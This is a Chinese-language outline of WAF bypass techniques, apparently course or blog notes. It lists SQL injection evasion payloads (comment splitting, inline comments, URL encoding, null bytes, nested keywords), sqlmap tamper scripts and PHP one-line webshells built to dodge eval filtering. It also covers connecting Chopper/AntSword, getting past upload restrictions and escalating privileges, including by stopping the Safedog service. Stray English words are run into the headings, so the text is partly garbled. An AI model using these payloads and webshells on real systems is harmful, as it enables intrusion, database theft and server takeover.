大綱:php
WAF防禦原理講解mysql
目錄掃描繞過WAFweb
手工注入繞過WAFsql
sqlmap繞過WAFshell
編寫salmap繞過WAF安全
過WAF一句話編寫講解服務器
菜刀鏈接繞過WAFcookie
webshell上傳繞過WAFapp
提權繞過WAF函數
WAF繞過原理詳解
知己知彼百戰百勝
瞭解WAF防禦原理
查看WAF防禦位置
熟悉防禦規則
瞭解防禦機制
查看攔截時間閥值
目錄掃描繞過WAF
兩種方式:
一、修改客戶端IP
二、減慢掃描速度
三、經過代理欺騙WAF
手工注入繞過WAF
搭建測試環境
瞭解繞過原理
熟悉常見繞過構造語句
構造繞過測試環境
搭建環境
利用mysql客戶端
配置注入源碼
注入繞過方法
一、大小寫變種
二、SQL註釋
三、URL編碼
四、空字節
五、嵌套、剝離
六、非標準入口點
七、避開自定義過濾器
使用註釋
union select 1,2,3 from admin
註釋完
/**/union/**/select/**/1,2,3 from admin
/**/un/**/io/**/n/**/sel/**/ec/**/t/**/ 1,2,3 from admin
第二種註釋
/*!and*/ 1=2
URL編碼
正常編碼
‘爲%27
1=52f *=%2a %=%25
/**/=%25 2f%25 2a*1
空字節
一些過濾器處理輸入時,碰到拿到空字節就會中止處理。
如:
id=1%00and1=2
嵌套剝離
一些過濾器將用戶的輸入進行剝離敏感函數
應對方法:
seleselectect
剝離後
select
總結編寫繞過語句
利用註釋
/*^abc^*/
包含關鍵字
/*!/*!/*!union*/
變換提交方式
get->post方式或cookie
sqlmap tamper利用
symboliclogical.py
space2mssqlhash.py
appendnullbyte.py
利用修改tamper繞過waf
嘗試編寫過waf一句話
思路:
利用可變變量
$a=b $b=c $$a=c
利用函數
利用判斷語句
利用編碼
<?php
@eval($_POST[x]);
?>
會攔截eval函數
<?php
@$_GET[a]($_post[x]);
?>
a:動態的傳參,傳eval函數或assert等函數
突破waf攔截鏈接菜刀
用最新版的菜刀
中國蟻劍
過狗菜刀+中轉腳本
上傳過waf
上傳突破禁止上傳PHP腳本
一、文件包含
二、雙文件上傳突破限制
三、修改上傳參數
提權過waf
經過程序讀密碼
利用waf繞過神器
利用exp讀hash
將用戶添加到遠程桌面組,並給目錄降權
用第三方軟件提權
system把安全狗服務中止,重啓服務器